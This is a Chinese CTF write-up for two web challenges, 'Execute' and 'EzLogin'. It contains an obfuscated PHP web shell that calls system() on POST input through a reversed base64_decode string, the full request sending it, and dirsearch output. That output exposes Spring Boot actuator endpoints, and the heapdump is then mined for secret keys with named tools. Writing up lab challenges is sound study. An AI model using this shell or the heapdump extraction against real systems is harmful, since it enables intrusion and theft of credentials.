本来不想来看的,但是群里一直在复读,难道会很有意思?
Execute 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 <?php $a = 'edoced_46esab' ;$b = strrev ($a );$d = 'c3~@#@#@lz!@dGVt' ;$s = $b ($d );echo $s ;$s ($_POST [1 ]);$e ='php' ;$f ='in' ;$w ='fo' ;$g =$e .$f .$w ;$g ();?>
1 2 3 4 5 6 7 8 9 10 11 12 POST /execute.php HTTP/1.1 Host : 39.106.16.204:44099Origin : http://39.106.16.204:44099User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36Accept : */*Accept-Language : zh-CN,zh;q=0.9,en;q=0.8Content-Type : application/x-www-form-urlencodedReferer : http://39.106.16.204:44099/Accept-Encoding : gzip, deflateContent-Length : 216code =%3 C%3 Fphp%0 A%24 a%20 %3 D%20 'edoced_46esab'%3 B%0 A%24 b%20 %3 D%20 strrev(%24 a)%3 B%0 A%0 A%24 d%20 %3 D%20 'c3~%40 %23 %40 %23 %40 lz!%40 dGVt'%3 B%0 A%24 s%20 %3 D%20 %24 b(%24 d)%3 B%0 A%0 Aecho%20 %24 s%3 B%0 A%24 s(%24 _POST%5 B1%5 D)%3 B%0 A%3 F%3 E&1 =tac /f*
没压力啊,直接秒了
EzLogin 没什么思路,扫描一下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 └─$ dirsearch -u http://39.106.16.204:61457/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /home/kali/桌面/reports/http_39.106.16.204_61457/__25-05-22_00-39-07.txt Target: http://39.106.16.204:61457/ [00:39:07] Starting: [00:39:14] 400 - 435B - /\..\..\..\..\..\..\..\..\..\etc\passwd [00:39:14] 404 - 96B - /;/login [00:39:15] 400 - 435B - /a%5c.aspx [00:39:15] 404 - 111B - /actuator/;/auditevents [00:39:15] 404 - 105B - /actuator/;/beans [00:39:15] 404 - 108B - /actuator/;/auditLog [00:39:15] 404 - 110B - /actuator/;/conditions [00:39:15] 200 - 2KB - /actuator [00:39:15] 404 - 106B - /actuator/;/caches [00:39:15] 404 - 111B - /actuator/;/configprops [00:39:15] 404 - 121B - /actuator/;/configurationMetadata [00:39:15] 404 - 104B - /actuator/;/dump [00:39:15] 404 - 108B - /actuator/;/features [00:39:15] 404 - 106B - /actuator/;/health [00:39:15] 404 - 111B - /actuator/;/healthcheck [00:39:15] 404 - 124B - /actuator/;/exportRegisteredServices [00:39:15] 404 - 106B - /actuator/;/flyway [00:39:15] 404 - 103B - /actuator/;/env [00:39:15] 404 - 106B - /actuator/;/events [00:39:15] 404 - 108B - /actuator/;/heapdump [00:39:15] 404 - 109B - /actuator/;/httptrace [00:39:15] 404 - 104B - /actuator/;/info [00:39:15] 404 - 107B - /actuator/;/jolokia [00:39:15] 404 - 107B - /actuator/;/logfile [00:39:15] 404 - 116B - /actuator/;/integrationgraph [00:39:15] 404 - 109B - /actuator/;/liquibase [00:39:15] 404 - 108B - /actuator/;/mappings [00:39:15] 404 - 113B - /actuator/;/loggingConfig [00:39:15] 404 - 107B - /actuator/;/refresh [00:39:15] 404 - 117B - /actuator/;/releaseAttributes [00:39:15] 404 - 107B - /actuator/;/loggers [00:39:15] 404 - 107B - /actuator/;/metrics [00:39:15] 404 - 110B - /actuator/;/prometheus [00:39:15] 404 - 118B - /actuator/;/registeredServices [00:39:16] 404 - 113B - /actuator/;/springWebflow [00:39:16] 404 - 103B - /actuator/;/sso [00:39:16] 404 - 110B - /actuator/;/statistics [00:39:16] 404 - 102B - /actuator/dump [00:39:16] 404 - 108B - /actuator/;/sessions [00:39:16] 404 - 110B - /actuator/;/threaddump [00:39:16] 404 - 117B - /actuator/;/resolveAttributes [00:39:16] 404 - 114B - /actuator/;/scheduledtasks [00:39:16] 404 - 106B - /actuator/;/status [00:39:16] 404 - 108B - /actuator/;/shutdown [00:39:16] 404 - 119B - /actuator/configurationMetadata [00:39:16] 404 - 109B - /actuator/auditevents [00:39:16] 404 - 111B - /actuator/;/ssoSessions [00:39:16] 404 - 104B - /actuator/events [00:39:16] 404 - 106B - /actuator/auditLog [00:39:16] 404 - 122B - /actuator/exportRegisteredServices [00:39:16] 404 - 105B - /actuator/;/trace [00:39:16] 404 - 107B - /actuator/httptrace [00:39:16] 404 - 104B - /actuator/flyway [00:39:16] 404 - 114B - /actuator/integrationgraph [00:39:16] 404 - 112B - /actuator/gateway/routes [00:39:16] 404 - 109B - /actuator/healthcheck [00:39:16] 200 - 20B - /actuator/caches [00:39:16] 404 - 105B - /actuator/jolokia [00:39:16] 404 - 106B - /actuator/features [00:39:16] 404 - 105B - /actuator/logfile [00:39:16] 404 - 107B - /actuator/liquibase [00:39:16] 200 - 2B - /actuator/info [00:39:16] 404 - 115B - /actuator/resolveAttributes [00:39:16] 404 - 111B - /actuator/loggingConfig [00:39:16] 404 - 105B - /actuator/refresh [00:39:16] 404 - 106B - /actuator/shutdown [00:39:16] 404 - 106B - /actuator/sessions [00:39:16] 404 - 116B - /actuator/registeredServices [00:39:16] 404 - 108B - /actuator/prometheus [00:39:16] 404 - 115B - /actuator/releaseAttributes [00:39:16] 404 - 108B - /actuator/management [00:39:16] 404 - 111B - /actuator/springWebflow [00:39:16] 200 - 8KB - /actuator/env [00:39:16] 404 - 104B - /actuator/status [00:39:16] 200 - 1018B - /actuator/metrics [00:39:16] 200 - 93KB - /actuator/beans [00:39:16] 404 - 108B - /actuator/statistics [00:39:16] 404 - 103B - /actuator/trace [00:39:16] 404 - 101B - /actuator/sso [00:39:16] 404 - 109B - /actuator/ssoSessions [00:39:16] 404 - 112B - /actuator/hystrix.stream [00:39:16] 200 - 54B - /actuator/scheduledtasks [00:39:16] 200 - 49KB - /actuator/loggers [00:39:17] 200 - 22KB - /actuator/mappings [00:39:17] 200 - 268B - /actuator/health [00:39:17] 200 - 99KB - /actuator/conditions [00:39:17] 200 - 197KB - /actuator/threaddump [00:39:17] 200 - 33MB - /actuator/heapdump [00:39:18] 200 - 14KB - /actuator/configprops [00:39:32] 404 - 102B - /images/README [00:39:32] 404 - 103B - /images/c99.php [00:39:32] 404 - 103B - /images/Sym.php [00:39:35] 200 - 11KB - /login [00:39:35] 200 - 11KB - /login/
heapdump泄露,先把东西下载下来,随便找个工具来处理,不要strings当原始人
https://github.com/wyzxxz/heapdump_tool
https://github.com/whwlsfb/JDumpSpider 但是第一个工具并没有成功
1 2 3 java -jar heapdump_tools.jar C:\Users\baozhongqi\Desktop\heapdump2 java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump2
拿到密钥之后用工具一把锁即可,如果不成功的多点点,随便乱按都能出,除非工具错了